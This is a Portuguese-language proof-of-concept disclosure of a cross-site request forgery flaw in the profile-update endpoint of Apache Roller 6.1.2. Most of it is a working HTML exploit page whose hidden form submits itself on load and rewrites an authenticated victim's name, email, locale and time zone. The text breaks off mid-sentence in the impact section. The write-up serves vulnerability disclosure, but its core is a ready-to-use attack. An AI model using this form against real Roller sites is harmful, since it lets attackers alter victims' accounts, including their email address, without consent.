
Exploit PoC para uma vulnerabilidade CSRF no endpoint de atualização de perfil do Apache Roller v6.1.2. Inclui código de exploit de formulário HTML para demonstrar alterações não autorizadas no perfil.
Foi descoberto que o Roller v6.1.2 e versões anteriores contêm uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no endpoint /roller/roller-ui/profile!save.rol.
Esta vulnerabilidade permite que atacantes atualizem arbitrariamente as informações de perfil do usuário vítima (por exemplo, e-mail, nome completo, idioma, fuso horário) através de uma página HTML manipulada.
A vulnerabilidade permite requisições não autorizadas para /roller/roller-ui/profile!save.rol que atualizam o perfil do usuário sem proteção CSRF.
<html>
<head>
<form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
<input name="bean.userName" value="vanlam" type="hidden">
<input name="bean.screenName" value="hacked" type="hidden">
<input name="bean.fullName" value="hacked" type="hidden">
<input name="bean.emailAddress" value="[email protected]" type="hidden">
<input name="bean.passwordText" value="" type="hidden">
<input name="bean.passwordConfirm" value="" type="hidden">
<input name="bean.locale" value="vi_VN" type="hidden">
<input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
</form>
<script>
document.getElementById('exploitForm').submit();
</script>
</head>
</html>
bean.userName: vanlambean.screenName: hackedbean.fullName: hackedbean.emailAddress: [email protected]bean.passwordText: (vazio)bean.passwordConfirm: (vazio)bean.locale: vi_VNbean.timeZone: Asia/BangkokUm atacante pode criar uma página HTML maliciosa que, quando visitada por um usuário autenticado do Roller, enviará automaticamente um formulário para atualizar as informações de perfil da vítima sem o seu consentimento. Isso pode levar a: